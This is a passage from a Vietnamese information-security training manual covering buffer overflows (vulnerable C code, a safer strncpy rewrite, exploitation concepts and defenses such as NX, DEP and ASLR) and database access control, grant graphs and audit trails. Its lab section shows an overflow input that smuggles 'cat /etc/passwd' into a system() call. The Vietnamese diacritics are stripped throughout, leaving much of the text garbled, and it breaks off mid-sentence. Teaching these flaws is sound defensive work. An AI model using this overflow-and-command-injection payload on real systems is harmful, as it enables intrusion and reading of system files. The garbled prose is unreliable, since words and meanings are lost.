c s cho nhiu th thut khai thc (exploit). Vic kim tra bin (bounds checking) y bi lp trnh vin hoc trnh bin dch c th ngn chn cc li trn b m. b. M t k thut Mt li trn b nh m xy ra khi d liu c vit vo mt b nh m, m do khng kim tra bin y nn ghi ln vng b nh lin k v lm hng cc gi tr d liu ti cc a ch b nh k vi vng b nh m . Hin tng ny hay xy ra nht khi sao chp mt xu k t t mt b nh m ny sang mt vng b nh m khc. c. V d c bn Trong v d sau, mt chng trnh nh ngha hai phn t d liu k nhau trong b nh: A l mt b nh m xu k t di 8 bytes, v B l mt s nguyn kch thc 2 byte. Ban u, A ch cha ton cc byte gi tr 0, cn B cha gi tr 3. Cc k t c kch thc 1 byte. By gi, chng trnh ghi mt xu k t "excessive" vo b m A, theo sau l mt byte 0 nh du kt thc xu. V khng kim tra di xu, nn xu k t mi ln gi tr ca B: Tuy lp trnh vin khng c nh sa i B, nhng gi tr ca B b thay th bi mt s c to nn t phn cui ca xu k t. Trong v d ny, trn mt h thng big-endian s dng m ASCII, k t "e" v tip theo l mt byte 0 s tr thnh s 25856. Nu B l phn t d liu duy nht cn li trong s cc bin c chng trnh nh ngha, vic vit mt xu k t di hn na v vt qu phn cui ca B s c th gy ra mt li chng hn nh segmentation fault (li phn on) v tin trnh s kt thc. d. Trn b nh m trn stack Bn cnh vic sa i cc bin khng lin quan, hin tng trn b m cn thng b li dng (khai thc) bi tin tc lm cho mt chng trnh ang chy thc thi mt on m ty c cung cp. Cc k thut mt tin tc chim quyn iu khin mt tin trnh ty theo vng b nh m b m c t ti . V d, vng b nh stack, ni d liu c th c tm thi "y" xung " nh" ngn xp (push), v sau c "nhc ra" (pop) c gi tr ca bin. Thng thng, khi mt hm (function) bt u thc thi, cc phn t d liu tm thi (cc bin a phng) c y vo, v chng trnh c th truy nhp n cc d liu ny trong sut thi gian chy hm . Khng ch c hin tng trn stack (stack overflow) m cn c c trn heap (heap overflow). Trong v d sau, "X" l d liu tng nm ti stack khi chng trnh bt u thc thi; sau chng trnh gi hm "Y", hm ny i hi mt lng nh b nh cho ring mnh; v sau "Y" gi hm "Z", "Z" i hi mt b nh m ln: Nu hm "Z" gy trn b nh m, n c th ghi d liu thuc v hm Y hay chng trnh chnh: iu ny c bit nghim trng i vi hu ht cc h thng. Ngoi cc d liu thng, b nh stack cn lu gi a ch tr v, ngha l v tr ca phn chng trnh ang chy trc khi hm hin ti c gi. Khi hm kt thc, vng b nh tm thi s c ly ra khi stack, v Page | 188 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

thc thi c trao li cho a ch tr v. Nh v y, nu a ch tr v b ghi bi mt li trn b m, n s tr ti mt v tr no khc. Trong trng hp mt hin tng trn b m khng c ch nh trong v d u tin, hu nh chc chn rng v tr s l mt v tr khng hp l, khng cha mt lnh no ca chng trnh, v tin trnh s v. Tuy nhin, mt k tn cng c th chnh a ch tr v tr ti mt v tr ty sao cho n c th lm tn hi an hinh h thng. e. M ngun v d M ngun C di y th hin mt li lp trnh thng gp. Sau khi c bin dch, chng trnh s to ra mt li trn b m nu n c gi vi mt tham s dng lnh l mt xu k t qu di, v tham s ny c dng ghi vo mt b nh m m khng kim tra di ca n. ************ /* overflow.c - demonstrates a buffer overflow */ #include #include int main(int argc, char *argv[]) { char buffer[10]; if (argc < 2) { fprintf(stderr, "USAGE: %s string\n", argv[0]); return 1; } strcpy(buffer, argv[1]); return 0; } ************ Cc xu k t di khng qu 9 s khng gy trn b m. Cc xu k t gm t 10 k t tr ln s gy trn b m: hin tng ny lun lun l mt li sai nhng khng phi lc no cng gy ra vic chng trnh ch y sai hay gy li segmentation faults Chng trnh trn c th c vit li cho an ton bng cch s dng hm strncpy nh sau: ******** /* better.c - demonstrates one method of fixing the problem */ #include #include int main(int argc, char *argv[]) { char buffer[10]; Page | 189 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

if (argc < 2) { fprintf(stderr, "USAGE: %s string\n", argv[0]); return 1; } strncpy(buffer, argv[1], sizeof(buffer)); buffer[sizeof(buffer) - 1] = '\0'; return 0; } ******* f. Khai thc C cc k thut khc nhau cho vic khai thc li trn b nh m, ty theo kin trc my tnh, h iu hnh v vng b nh. V d, khai thc ti heap (dng cho cc bin cp pht ng) rt khc vi vic khai thc cc bin ti stack. Khai thc li trn b m trn stack Mt ngi dng tho k thut v c xu c th khai thc cc li trn b m trn stack thao tng chng trnh theo mt trong cc cch sau: Ghi mt bin a phng nm gn b nh m trong stack thay i hnh vi ca chng trnh nhm to thun li cho k tn cng. Ghi a ch tr v trong mt khung stack (stack frame). Khi hm tr v, thc thi s c tip tc ti a ch m k tn cng ch r, thng l ti mt b m cha d liu vo ca ngi dng. Nu khng bit a ch ca phn d liu ngi dng cung cp, nhng bit rng a ch ca n c lu trong mt thanh ghi, th c th ghi ln a ch tr v mt gi tr l a ch ca mt opcode m opcode ny s c tc dng lm cho thc thi nhy n phn d liu ngi dng. C th, nu a ch on m c hi mun chy c ghi trong mt thanh ghi R, th mt lnh nhy n v tr cha opcode cho mt lnh jump R, call R (hay mt lnh tng t vi hiu ng nhy n a chi ghi trong R) s lm cho on m trong phn d liu ngi dng c thc thi. C th tm thy a ch ca cc opcode hay cc byte thch hp trong b nh ti cc th vin lin kt ng (DLL) hay trong chnh file thc thi. Tuy nhin, a ch ca opcode thng khng c cha mt k t null (hay byte 0) no, v a ch ca cc opcode ny c th khc nhau ty theo cc ng dng v cc phin bn ca h iu hnh.D n Metapoloit l mt trong cc c s d liu cha cc opcode thch hp, tuy rng trong ch lit k cc opcode trong h iu hnh Microsoft Windows. Khai thc li trn b m trn heap Mt hin tng trn b m xy ra trong khu vc d liu heap c gi l mt hin tng trn heap v c th khai thc c bng cc k thut khc vi cc li trn stack. B nh heap c cp pht ng bi cc ng dng ti thi gian ch y v thng cha d liu ca chng trnh. Vic khai thc c thc hin bng cch ph d liu ny theo cc cch c bit lm Page | 190 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

cho ng dng ghi ln cc cu trc d liu ni b chng hn cc con tr ca danh sch lin kt. L hng ca Microsoft JPG GDI+l mt v d gn y v s nguy him m mt li trn heap. Cn tr i vi cc th thut khai thc Vic x l b m trc khi c hay thc thi n c th lm tht bi cc c gng khai thc li trn b m. Cc x l ny c th gim bt mi e da ca vic khai thc li, nhng c th khng ngn chn c mt cch tuyt i. Vic x l c th bao gm: chuyn t ch hoa thnh ch thng, loi b cc k t t bit (metacharacters) v lc cc xu khng cha k t l ch s hoc ch ci. Tuy nhin, c cc k thut trnh vic lc v x l ny; alphanumeric code (m gm ton ch v s), polymorphic code (m a hnh), Self-modifying code (m t sa i) v tn cng kiu return-to-libc.. Cng chnh cc phng php ny c th c dng trnh b pht hin bi cc h thng pht hin thm nhp (Intrusion detection system). g. Chng trn b m Nhiu k thut a dng vi nhiu u nhc im c s dng pht hin hoc ngn chn hin tng trn b m. Cch ng tin cy nht trnh hoc ngn chn trn b m l s dng bo v t ng ti mc ngn ng lp trnh. Tuy nhin, loi bo v ny khng th p dng cho m tha k (legacy code), v nhiu khi cc rng buc k thut, kinh doanh hay vn ha li i hi s dng mt ngn ng khng an ton. Cc mc sau y m t cc la chn v ci t hin c. La chn ngn ng lp trnh La chn v ngn ng lp trnh c th c mt nh hng ln i vi s xut hin ca li trn b m. Nm 2006, C v C++ nm trong s cc ngn ng lp trnh thng dng nht, vi mt lng khng l cc phn mm c vit bng hai ngn ng ny. C v C++ khng cung cp sn cc c ch chng li vic truy nhp hoc ghi d liu ln bt c phn no ca b nh thng qua cc con tr bt hp l; c th, hai ngn ng ny khng kim tra xem d liu c ghi vo mt mng ci t ca mt b nh m) c nm trong bin ca mng hay khng. Tuy nhin, cn lu rng cc th vin chun ca C++, th vin khun mu chun - STL, cung cp nhiu cch an ton lu tr d liu trong b m, v cc lp trnh vin C cng c th to v s dng cc tin ch tng t. Cng nh i vi cc tnh nng bt k khc ca C hay C++, mi lp trnh vin phi t xc nh la chn xem h c mun chp nhn cc hn ch v tc chng trnh thu li cc li ch tim nng ( an ton ca chng trnh) hay khng. Mt s bin th ca C, chng hn Cyclone, gip ngn chn hn na cc li trn b m bng vic chng hn nh gn thng tin v kch thc mng vi cc mng. Ngn ng lp trnh D s dng nhiu k thut a dng trnh gn ht vic s dng con tr v kim tra bin do ngi dng xc nh.

Page | 191 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Nhiu ngn ng lp trnh khc cung cp vic kim tra ti thi gian chy, vic kim tra ny gi mt cnh bo hoc ngoi l khi C hoc C++ ghi d liu. V d v cc ngn ng ny rt a dng, t pythol ti Ada, t Lisp ti Modula-2, v t Smalltalk ti OCaml. Cc mi trng bytecode ca Java v .NET cng i hi kim tra bin i vi tt c cc mng. Gn nh tt c cc ngn ng thng dch s bo v chng trnh trc cc hin tng trn b m bng cch thng bo mt trng thi li nh r (well-defined error). Thng thng, khi mt ngn ng cung cp thng tin v kiu thc hin kim tra bin, ngn ng thng cho php la chn kch hot hay tt ch . Vic phn tch tnh (static analysis) c th loi c nhiu kim tra kiu v bin ng, nhng cc ci t ti v cc trng hp ri rm c th gim ng k hiu nng. Cc k s phn mm phi cn thn cn nhc gia cc ph tn cho an ton v hiu nng khi quyt nh s s dng ngn ng no v cu hnh nh th no cho trnh bin dch. S dng cc th vin an ton Vn trn b m thng gp trong C v C++ v cc ngn ng ny l cc chi tit biu din mc thp ca cc b nh m vi vai tr cc ch cha cho cc kiu d liu. Do , phi trnh trn b m bng cch gn gi tnh ng n cao cho cc phn m chng trnh thc hin vic qun l b m. Vic s dng cc th vin c vit tt v c kim th, dnh cho cc kiu d liu tru tng m cc th vin ny thc hin t ng vic qun l b nh, trong c kim tra bin, c th lm gim s xut hin v nh hng ca cc hin tng trn b m. Trong cc ngn ng ny, xu k t v mng l hai kiu d liu chnh m ti cc hin tng trn b m thng xy ra; do , cc th vin ngn chn li trn b m ti cc kiu d liu ny c th cung cp phn chnh ca s che chn cn thit. D vy, vic s dng cc th vin an ton mt cch khng ng c th dn n trn b m v mt s l hng khc; v tt nhin, mt li bt k trong chnh th vin chnh n cng l mt l hng. Cc ci t th vin "an ton" gm The Better String Library, Arri Buffer API v Vstr. Th vin C ca h iu hnh OpenBSD cung cp cc hm hu ch strlcpy strlcat nhng cc hm ny nhiu hn ch hn nhiu so vi cc ci t th vin an ton y . Thng 9 nm 2006, Bo co k thut s 24731 ca hi ng tiu chun C c cng b, bo co ny m t mt tp cc hm mi da trn cc hm vo ra d liu v cc hm x l xu k t ca th vin C chun, cc hm mi ny c b sung cc tham s v kch thc b m. Chng trn b nh m trn stack Stack-smashing protection l k thut c dng pht hin cc hin tng trn b m ph bin nht. K thut ny kim tra xem stack b sa i hay cha khi mt hm tr v. Nu stack b sa , chng trnh kt thc bng mt li segmentation fault. Cc h thng s dng k thut ny gm c Libsafe, StackGuard v cc bn v li (patch) Propolicy. Ch Data Execution Prevention (cm thc thi d liu) ca Microsoft bo v thng cc con tr ti SEH Exception Handler, khng cho chng b ghi .

Page | 192 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

C th bo v stack hn na bng cch phn tch stack thnh hai phn, mt phn dnh cho d liu v mt phn cho cc bc tr v ca hm. S phn chia ny c dng trong ngn ng lp trnh Forth, tuy n khng phi mt quyt nh thit k da theo tiu ch an ton. Nhng d sao th y cng khng phi mt gii php hon chnh i vi vn trn b m, khi cc d liu nhy cm khng phi a ch tr v vn c th b ghi . Bo v khng gian thc thi Bo v khng gian thc thi l mt cch tip cn i vi vic chng trn b m. K thut ny ngn chn vic thc thi m ti stack hay heap. Mt k tn cng c th s dng trn b m chn mt on m ty vo b nh ca mt chng trnh, nhng vi bo v khng gian thc thi, mi c gng ch y on m s gy ra mt ngoi l (exception). Mt s CPU h tr mt tnh nng c tn bit NX ("No eXecute" - "Khng thc thi") hoc bit XD ("eXecute Disabled" - "ch thc thi b tt" ). Khi kt hp vi phn mm, cc tnh nng ny c th c dng nh du cc trang d liu (chng hn cc trang cha stack v heap) l c c nhng khng thc thi c. Mt s h iu hnh Unix (chng hn OpenBSD, Mac OS X) c km theo tnh nng bo v khng gian thc thi. Mt s gi phn mm ty chn bao gm: PaX Exec Shield Openwall Cc bin th mi ca Microsoft Windows cng h tr bo v khng gian thc thi, vi tn gi Data Execution Prevention (ngn chn thc thi d liu). Cc phn mm gn km (Add-on) bao gm: SecureStack OverflowGuard BufferShield StackDefender Phng php bo v khng gian thc thi khng chng li c tn cng return-to-libc. Ngu nhin ha s khng gian a ch Ngu nhin ha s khng gian a ch (Address space layout randomization - ASLR) l mt tnh nng an ninh my tnh c lin quan n vic sp xp v tr cc vng d liu quan trng (thng bao gm ni cha m thc thi v v tr cc th vin, heap v stack) mt cch ngu nhin trong khng gian a ch ca mt tin trnh. Vic ngu nhin ha cc a ch b nh o m cc hm v bin nm ti lm cho vic khai thc mt li trn b m tr nn kh khn hn, nhng phi l khng th c. N cn buc k tn cng phi iu chnh khai thc cho hp vi tng h thng c th, iu ny lm tht bi c gng ca cc con Su internet Mt phng php tng t nhng km hiu qu hn, l k thut rebase i vi cc tin trnh v th vin trong khng gian a ch o. Kim tra su i vi gi tin Bin php kim tra su i vi gi tin (deep packet inspection - DPI) c t h pht hin cc c gng t xa khai thc li trn b m ngay t bin gii mng. Cc k thut ny c kh nng chn cc gi tin c cha ch k ca mt v tn cng bit hoc cha mt chui di cc lnh No-Operation (NOP - lnh rng khng lm g), cc chui nh vy thng c s dng khi v tr ca ni dung quan trng (payload) ca tn cng hi c bin i. Page | 193 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Vic r cc gi tin khng phi l mt phng php hiu qu v n ch c th ngn chn cc tn cng bit, v c nhiu cch m ha mt lnh NOP. Cc k tn cng c th s dng m alphanumeric, metamorphic, v Shellcode t sa trnh b pht hin bi vic r gi tin. h. Thc hnh: Ta khi ng h iu hnh Linux bng da CD, sau son 1 on code c ni dung sau: #include <stdio.h> main() { char *name; char *dangerous_system_command; name = (char *) malloc(10); dangerous_system_command = (char *) malloc(128); printf("Address of name is %d\n", name); printf("Address of command is %d\n", dangerous_system_command); sprintf(dangerous_system_command, "echo %s", "Hello world!"); printf("What's your name?"); gets(name); system(dangerous_system_command); } Lu on sau y thnh file text v bin dch bng gcc root@1[Desktop]# gcc buffer.c -o buffer buffer.c:13:2: warning: no newline at end of file /tmp/ccefevDP.o(.text+0x82): In function `main': : warning: the `gets' function is dangerous and should not be used. root@1[Desktop]# ./buffer Address of name is 134520840 Address of command is 134520856 What's your name?hao Hello world! root@1[Desktop]# ./buffer Address of name is 134520840 Address of command is 134520856 What's your name?1234567890123456cat /etc/passwd

V.

AN TON D LIU

1. An ton c s d liu C s d liu ca mt c quan, mt x nghip, ca mt ngnh... thng c ci t tp trung hay phn tn trn cc my ch trn mng, l ti nguyn thng tin chung cho nhiu ngi cng s dng. V vy cc h c s d liu cn phi c c ch kim sot, qun l v truy xut khai thc Page | 194 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

thng tin sao cho d liu phi c an ton v ton vn. Thut ng an ton d liu c ngha l cc h c s d liu cn phi c bo v chng truy nhp nhm sa i hay ph hoi mt cch ch nh hay khng ch nh. Nh vy cc h thng c s d liu cn thit phi qun tr, bo v tp trung, nhm bo m c tnh ton vn v an ton d liu. Ton vn d liu khc vi an ton d liu, tuy rng chng c mi quan h mt thit vi nhau. C th s dng chung mt s bin php thc hin. C rt nhiu mi nguy him e do n cc h thng d liu: C s d liu c ci t tp trung hay phn tn trn cc v tr a l khc nhau, c khai thc t cc u cui khc nhau theo ch Client/Server. Nhiu ngi s dng truy nhp v khai thc trn cng mt c s d liu. Rt nhiu loi d liu c ti v gi trn cc my cc b khai thc. Truy xut vo cc h c s d liu bng nhiu ngn ng thao tc d liu khc nhau, bng nhiu h ng dng khc nhau trn cng mt ni dung thng tin. V vy c th xy ra Nhng sai st ngoi mun, khi thc hin thm, sa, xo hay do li khi lp trnh. Truy nhp tri php vi mc ch xu: sa, xo thng tin hay nh cp thng tin... S c k thut nh li do cc thit b, li lp trnh... D liu lu tr trong c s d liu cn phi c bo v trnh vic truy nhp tri php v ph hoi c ch nh hay khng ch nh khi thc hin cp nht, sa i hay b sung thng tin trong cc c s d liu. Cn phi c bin php bo v chng li vic a d liu vo mt cch khng nht qun nh hng nghim trng n tnh ton vn d liu.

a. S vi phm an ton c s d liu.


Cc dng truy cp c ch nh bao gm : Khng cho php c d liu. Khng cho php sa i d liu. Khng cho php ph hu d liu... Vn an ton c s d liu cp n vic bo v chng li s truy cp c ch nh. Vic bo v tuyt i cc h c s d liu khi truy nhp l khng th, nhng phi c cc bin php mnh ngn chn hu ht truy cp tri php vo c s d liu. b. Cc mc an ton c s d liu. bo v c s d liu, phi thc hin cc bin php m bo an ton mt vi mc bo v nh sau: Mc an ton h thng c s d liu: Ty thuc vo yu cu ca ngi s dng m ngi qun tr c s d liu cp php truy nhp mt phn vo c s d liu. Nhng ngi s dng khc c th c php thc hin cc cu hi truy vn, nhng c th b ngn cm nh sa i d liu. Mc an ton h thng iu hnh: .Mc h thng kim sot ton b mc iu hnh h thng. Vn an ton mc h thng iu hnh s c m bo bi mc an ton h thng c s d liu. An ton trong h iu hnh c tin hnh ti nhiu cp t sp xp cc mt m Page | 195 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

truy cp vo h thng cho ti s c lp cc qu trnh ang cng x l trong h thng. Tp h thng cng cung cp mt s cp bo v. S tham kho nhng ch trong th mc l bao qut ca nhng ch ny trong cc bi hc v h thng iu hnh. An ton mc mng. Hu ht cc h thng c s d liu u cho php truy cp t xa thng qua cc thit b u cui. An ton d liu mc mng l chng n cp thng tin, sao chp thng tin v sa i ni dung thng tin trn ng truyn. Vn an ton cp mc mng t c nhiu kt qu, ng dng ph bin trn mng Internet. Danh sch cc ch trong th mc bao qut nn tng nguyn l ca vn an ton mng. Nhn din ngi s dng: T nh ngha an ton d liu c th suy ra rng, h qun tr c s d liu DBMS khng cho php ngi s dng c thc hin mt thao tc no nu khng c php ca ngi qun tr CSDL. Ngi qun tr CSDL phi: Xc nh cho h thng nhng thao tc m ngi s dng c php thc hin. Cung cp mt phng tin cho ngi s dng h thng nhn bit h. Ni chung ngi s ng u c trao nhng quyn khc nhau. Nhng quyn ny c th bo m quyn c mt s phn ca c s d liu, quyn chn thm, xa hay sa i d liu. Hnh thc thng dng nht nhn ra ngi s dng l mt khu, v ch c h thng v ngi s dng bit. Mt khu cng c h thng bo v nh bo v d liu. Bo v mc vt l: Mt m hnh bo v ng tin cy cng c kh nng b tn cng vo c s d liu, t vic ph c mt khu n vic nh cp cc thit bi. C th chng nh cp kh hiu qu bng cch m ha, che du d liu. Mt h thng c bo mt cao cn phi c nhng phng thc nhn din khc tt hn mt khu, nh nhn din tng ngi s dng qua mt nhn vin bo v, hoc kt vi cc quy nh v hnh chnh... Kim tra truy nhp: Vi mi ngi s dng h thng s qun l mt h s c pht sinh t vic cc chi tit v th tc xut trnh, xc minh v cc chi tit c quyn thao tc m ngi qun tr c s d liu cp cho ngi s dng. H thng s kim tra tnh php l ca mi mt thao tc ca ngi s dng. V d yu cu c c li nh gi hng nm ca mi mt nhn vin, ch c th c php nu c s d liu c cha thng tin quy nh rng ngi yu cu phi l Gim c, trng, ph phng t chc, chnh vn phng. Tt c cc i tng khc khng c trong c s d liu khng c php truy xut. DBMS s kim tra mi mt thao tc ca ngi s dng xem c vi phm cc rng buc an ton hay khng, nu c s phi hu b. Mt rng buc truy nhp ni chung c lin quan n mt b phn ca c s d liu. Do tn ti mt c quyn thch hp, gi s l chng trnh s kim tra mi mt yu cu ca ngi s dng. Chng trnh s sp xp quyn truy nhp theo mc phc tp tng dn sao cho t ti quyt nh cui cng nhanh nht c th. An ninh tt c cc cp phi c duy tr nu an ninh c s d liu c bo m. Mt s yu km vn an ton cp thp (cp vt l hay cp con ngi) cho php s ph v cc bin php an ton nghim ngt cp cao (cp h thng c s d liu). c. Nhng quyn hn khi s dng h c s d liu. C th chia quyn hn truy nhp vo c s d liu.nh sau Page | 196 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

c mt cch hp php: ngi s dng c php c, nhng khng c sa i ni dung d liu. Chn mt cch hp php: l cho php ngi s dng c chn thm d liu mi vo c s d liu, nhng khng sa i d liu hin c. Sa i mt cch hp php: cho php ngi s dng c php sa i ni dung d liu, nhng khng c xo d liu. Xo mt cch hp php: cho php ngi s dng c php xo d liu. Cho php vic to v xo cc ch s. Cho php vic to cc mi quan h mi. Sa i cu trc: cho php chn thm, sa i hoc xo cc thuc tnh trong cc quan h. B hp php: cho php xo cc quan h. Mt ngi s dng c th c tt c cc quyn trn, hoc ch c mt s quyn hn nht nh. Thm vo nhng dng ca s cho php truy cp d liu chng ta c th ban cho ngi s dng c php sa i c cu c s d liu. Cho php b v xo l khc nhau trong xo hp php l ch cho php xo b d liu. Nu mt ngi s dng xo tt c cc b ca mt quan h, quan h s vn tn ti nhng quan h khng cn g. Nu mt quan h b b n s khng cn tn ti na. minh ho bn cht ca vn , khng mt tnh tng qut, cc mnh sau ch l mt vi nim phm vi bo v thng tin trong cc h c s d liu, ch ra cc mc truy nhp CSDL v trao quyn cho tng lp ngi s dng: Ngi s dng c php truy nhp khng iu kin ti ton b c s d liu, vi mi php ton lu tr v truy vn d liu tr. Ngi s dng khng c php truy nhp ti bt k b phn no ca c s d liu, vi mi php ton. Ngi s dng c th c ng mt ni dung cng vic ca h trong c s d liu, nhng khng c php sa i, b sung n. Ngi s dng c th c ng mt ni dung cng vic ca h trong c s d liu, v c php sa i, b sung n. Ngi s dng c th c v sa i thuc tnh m nhn vin, h v tn nhn vin, n v cng tc theo nh k vo tun u ca mi thng. Ngi s dng cm c thuc tnh nhn xt hng nm, cc thuc tnh mc lng v ngy ln lng c c v sa i, cc thuc tnh khc ch c c. Cng vic ch c thc hin trong khong thi gian t 9 gi n 11 gi trong cc ngy ca tun cui thng. Ngi s dng c quyn s dng cc php ton thng k cho thuc tnh mc lng tnh mc lng trung bnh trong tng n v. Cm sa i d liu. d. Khung nhn mt c ch bo v Khung nhn, bng cch nh ngha li c s d liu khi nim, khng ch to iu kin thun li khi lp trnh trnh ng dng v lm tng tnh c lp d liu logic, m cn c s dng nh mt c ch bo v. C hai loi khung nhn. Loi khung nhn ch c, khng cho php sa Page | 197 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

i. Loi khung ny gi l khung ch c.Trong nhiu trng hp, ngi qun tr CSDL cho php ngi s dng ny c c d liu, nhng ngi khc va c c, va c quyn sa i, b sung...Loi khung nhn th hai cho php c v ghi ln cc thnh phn ca khung nhn. v mi sa i cho khung nhn c th c lu trong lc khi nim. SQL xut cho php c/ghi cc khung nhn trong mt phm vi nht nh. Vi phng php ny thit k cc chng trnh ng dng linh hot hn loi khung ch c. Tuy nhin, khi thao tc cp nht trn cc khung nhn c/ghi thng gy tc ng n mt s thnh phn ca c s d liu khng nm trong khung nhn. V d trong mt h CSDL phn cp, trong khung nhn ch c kiu bn ghi gc, khng c bn ghi ph thuc. Nu xa xut hin ca kiu bn ghi nay, ko theo phi xa cc xut hin bn ghi ph thuc. y l mt hnh ng khng hp l, vi phm nguyn tc khng cho ngi s dng c php xa mt i tng m h khng thy c trong khung nhn. Cng tng t nh trong m hnh mng, nu xa mt bn ghi khi khng bit cc bn ghi khc nm ngoi khung nhn bhng c quan h vi n. V nhiu trng hp khc tng t. V vy, tt c cc h qun tr c s d liu .DBMS gii hn quyn cp nht cc khung nhn trong mt s trng hp c th. V d v hot ng ca ngn hng, mt th k cn bit tn ca tt c cc khch hng c cc khon vay ti nhiu chi nhnh. Ngi th k ny khng c php xem nhng thng tin v khon vay c bit m khch hng c th c. Hnh ng ca c th k b t chi khi truy nhp trc tip ti quan h cho vay, nhng c th truy nhp bng khung nhn cust-loan bao gm cc thng tin nh: tn ca khch hng v chi nhnh ni m khch c khon vay. Khung nhn ny c th c nh ngha trong SQL nh sau: CREATE VIEW cust-loan AS (SELECT branch-name, customer-name FROM borrower, loan WHERE borrower.loan-number = loan.loan-number) Gi s rng c th k a ra truy vn SQL nh sau: SELECT * FROM cust-loan Nh vy ngi th k c php xem kt qu ca truy vn trn, tuy nhin qu trnh x l truy vn ny s c thc hin trn cc quan h BORROWER and LOAN. V vy h thng phi kim tra cc quyn hn trn truy vn ca th k trc khi bt u qu trnh x l truy vn. Vic to mt khung nhn khng ph thuc vo cc quan h ngun. Mt ngi s dng to ra mt khung nhn khng c nhn tt c cc c quyn trn khung nhn. V d, ngi s dng khng c quyn cp nht trn khung nhn nu khng c quyn cp nht vo quan h bng khung nhn c nh ngha. Nu ngi s dng to ra mt khung nhn trn nhng quyn hn khng c php, th h thng s ph nhn yu cu to khung nhn. Trong v d khung nhn cust-loan trn, ngi to khung nhn phi c quyn c trn c hai quan h BORROWER and LOAN. e. Cp php cc quyn truy nhp Mt ngi s dng c cp mt vi quyn truy nhp c s d liu v cc quyn hn ny c th tham chiu n quyn truy nhp ca ngi s dng khc. Tuy nhin ngi qun tr c s d liu cng cn phi c bit lu khi cc quyn ny lu thng qua gia nhiu ngi s dng, sao cho cc quyn ny c th c thu hi ti mt thi im ty .

Page | 198 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Hnh 1

th cp quyn truy nhp c s d liu

V d, gi s khi khi to, ngi qun tr c s d liu cp quyn cp nht d liu trn quan h LOAN ca c s d liu ngn hng cho ngi s dng U1, U2 v U3 v quyn c th trong th t thng qua quyn hn n cc quyn ca nhng ngi s dng khc. Lin thng cc quyn t mt ngi s dng ny ti ngi s dng khc c m t bng mt th quyn hn. th bao gm cc nt l nhng ngi s dng v cc cnh Ui Uj nu ngi s dng Ui cp quyn cp nht trn LOAN cho ngi s dng Uj. Gc ca th l ngi qun tr c s d liu. Trong hnh 1, ngi s dng U5 c cp quyn hn bi hai ngi s dng U1 v U2 v ngu s dng U4 c cp quyn s dng ch bi U1. Mt ngi s dng c quyn hn truy nhp vo c s d liu theo mt s quyn no khi v ch khi (if and only if) c mt ng i t gc trn th quyn hn, tc l lin thng t nt ngi qun tr c s d liu ti nt ngi s dng. Gi s ngi qun tr c s d liu quyt nh thu hi cc quyn hn ca ngi s dng U1. V ngi s dng U4 c quyn hn dn t U1 nn quyn hn ca U4 cng s b thu hi. Tuy nhin, v U5 c cp quyn bi U1 v U2 , v th ngi qun tr c s d liu ch thu hi t U1 dn U5, khng thu hi quyn cp nht trn LOAN ca U2. U5 vn cn quyn cp nht trn quan h LOAN. Nu ngi qun tr thu hi quyn cp nht ca U2 th U5 s mt quyn hn trn quan h LOAN. Hnh 2 C gng hu b nhng quyn hn b thu hi

Page | 199 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

C th xy ra nhng trng mt cp ngi s dng lu c c th c gng khng chp nhn cc quy tc thu hi quyn c cp pht. Gi s th cp pht quyn truy nhp nh trong hnh 2a. Ngoi cc cnh xut pht t gc DBA n U1, U2 v U3, gia U2 v U3 cn tn ti cc ng t U2 n U3 v ngc li t U3 n U2. iu ny c ngha l ngi qun tr cp pht quyn cho U1, U2 v U3, U2 cn thm cc quyn ca U2 v U3 cn thm cc quyn ca U2. Nu ngi qun tr c s d liu thu hi quyn ca U3 gi li quyn hn ca U2 th quyn truy nhp ca U3 vn cn, khng b mt v ng i t gc n U3 lin thng qua U2 nh trong hnh 2b. Nu thu hi ng thi quyn ca c hai ngi s dng U3, U3 khi cc quyn ca U3 v U3 vn tn ti nh trong hnh 2c. Tuy nhin khi nh qun tr c s d liu xo b cnh t U3 ti U2 v t U2 ti U3 th cc quyn s khng khng tn ti trn ng truyn bt ngun t ngi qun tr c s d liu. Tuy nhin, ngi qun tr c s d liu yu cu tt c cc cnh trong th cp quyn truy nhp phi lin thng bt u t nt gc, hay bt u t ngi qun tr DBA. Nh vy cnh i t U2 v U3 v ngc li s b xa, tc l cc quyn t U2 n U3 v ngc li phi c thu hi nh trong hnh

Page | 200 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Hnh 3 f. Kim tra du vt

th quyn truy nhp c s d liu

Nhiu ng dng v bo mt c s d liu cn duy tr mt c ch kim tra du vt. Mt s kim tra du vt l mt bn lu tt c cc thay i khi thc hin cc php lu tr nh chn thm, xo v sa i thng tin trong c s d liu cng vi nhng thng tin pht sinh thm trong qu trnh thc hin. Vic kim tra du vt s gip cho vic d tm c cc nguyn nhn nhanh v chnh xc. V d nu mt ti khon no c pht hin khng cn i, ngi qun tr c th ln du vt ca tt c cc cp nht xy ra trong ti khon tm thy s cp nht khng ng (c th l gian ln) ca nhng ngi thc hin vic cp nht. To ra mt s kim tra du vt bng cch nh ngha cc chui phn ng thch hp trn cc cp nht quan h (s dng h thng cc gi tr nh ngha nhn bit tn ngi s dng v ln truy nhp). Tuy nhin nhiu h thng c s d liu cung cp phng php to s kim tra du vt thun tin v d s dng. 2. Gim st thng k c s d liu Trong mt s d n ti tng tri qua, vic theo di li nhng hnh ng xy ra trong c s d liu l mt vic lm ht sc quan trng, gii php ca n rt nhiu, kh khn cng rt nhiu, hm nay, ti gii thiu mt cch tip cn kh n gin m cc k hiu qu, nu bi vit ny c ch vi bn, xin ng ngn ngi ng gp kin ca bn di bi vit ny. Bn s theo di nhng thay i trong database nh th no, khi ngi dng xa, sa d liu. Bn s c mt vi cch tip cn sau: To ra mt ct tn l isDeleted: thot nhn phi cng nhn tng ny rt tt, bt c khi no d liu trn ct b xa n s khng xa b hon ton m ch nh du m thi, cch gii 